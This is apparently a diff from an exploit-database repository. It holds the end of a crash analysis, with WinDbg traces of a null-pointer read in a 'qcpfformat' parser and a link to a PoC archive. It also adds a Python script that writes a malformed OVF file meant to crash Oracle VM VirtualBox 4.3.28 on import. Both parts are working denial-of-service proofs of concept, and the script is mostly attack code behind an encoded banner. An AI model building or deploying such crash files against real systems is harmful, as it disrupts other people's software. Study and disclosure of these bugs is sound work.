12 00d7e608 57c38009 1d26c088 00000002 1d26c088 rpmn3260!SetDLLAccessPath+0x58b1a
13 00d7e628 585bc25e 1d26c088 1d26c088 00000000 rpmn3260!SetDLLAccessPath+0x18269
Disassembly:
qcpfformat+0x13d0:
534013d0 55 push ebp
534013d1 8bec mov ebp,esp
534013d3 83794000 cmp dword ptr [ecx+40h],0
534013d7 8b5508 mov edx,dword ptr [ebp+8]
534013da 7422 je qcpfformat+0x13fe (534013fe)
534013dc 0fb64203 movzx eax,byte ptr [edx+3]
534013e0 0fb64a02 movzx ecx,byte ptr [edx+2]
534013e4 c1e008 shl eax,8
The edx register is being zeroed out by the move from ebp+8 at +13d7, causing the memory read at instruction 13dc to point to 0x00000003
In the analysis below the PoC files place in memory starts at 0b880012
Here the first VRAT tag (hex 76 72 61 74) is read in correctly the first time from 0b881044. As can be seen in the instructions above that, on the first iteration EBP is pointing at the tags but is quickly set to an address outside the file.
Breakpoint 1 hit
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d0 esp=00bce58c ebp=0b881040 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d0:
54cd13d0 55 push ebp
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d1 esp=00bce588 ebp=0b881040 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d1:
54cd13d1 8bec mov ebp,esp
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d3 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d3:
54cd13d3 83794000 cmp dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d7 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13d7:
54cd13d7 8b5508 mov edx,dword ptr [ebp+8] ss:002b:00bce590=0b881044
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13da esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13da:
54cd13da 7422 je qcpfformat+0x13fe (54cd13fe) [br=0]
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13dc esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13dc:
54cd13dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:0b881047=74
0:000> t
eax=00000074 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e0 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e0:
54cd13e0 0fb64a02 movzx ecx,byte ptr [edx+2] ds:002b:0b881046=61
0:000> t
eax=00000074 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e4 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e4:
54cd13e4 c1e008 shl eax,8
0:000> t
eax=00007400 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e7 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13e7:
54cd13e7 0bc1 or eax,ecx
0:000> t
eax=00007461 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e9 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e9:
54cd13e9 0fb64a01 movzx ecx,byte ptr [edx+1] ds:002b:0b881045=72
0:000> t
eax=00007461 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13ed esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13ed:
54cd13ed c1e008 shl eax,8
0:000> t
eax=00746100 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f0 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f0:
54cd13f0 0bc1 or eax,ecx
0:000> t
eax=00746172 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f2 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f2:
54cd13f2 0fb60a movzx ecx,byte ptr [edx] ds:002b:0b881044=76
0:000> t
eax=00746172 ebx=00bce5e8 ecx=00000076 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f5 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f5:
54cd13f5 c1e008 shl eax,8
So now both ESP and EBP are pointing outside the source file, causing the next iteration to read NULL into EDX, setting up the access violation:
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d0 esp=00bce4d0 ebp=00bce51c iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d0:
54cd13d0 55 push ebp
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d1 esp=00bce4cc ebp=00bce51c iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d1:
54cd13d1 8bec mov ebp,esp
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d3 esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d3:
54cd13d3 83794000 cmp dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d7 esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13d7:
54cd13d7 8b5508 mov edx,dword ptr [ebp+8] ss:002b:00bce4d4=00000000
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
eip=54cd13da esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13da:
54cd13da 7422 je qcpfformat+0x13fe (54cd13fe) [br=0]
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
eip=54cd13dc esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13dc:
54cd13dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:00000003=??
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40617.zip

91
platforms/windows/dos/40618.py Executable file
View file

@ -0,0 +1,91 @@
#Exploit Title: Oracle VM VirtualBox 4.3.28 Crash
#Author: sultan albalawi
#Tested on:win7
#open viryualbox -->ctrl+i-->choose file -->double+double+double next
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print ban
pof1 = "<"
pof2 = "http://"
Crash = "\x41"*19
pof3=">"
vm = pof1+pof2+Crash+pof3+pof1+pof2+Crash+pof3
Crash_file=("Crach.ovf")
file = open(Crash_file, "w")
file.write(vm)
file.close()
print 'file done'.format(Crash_file)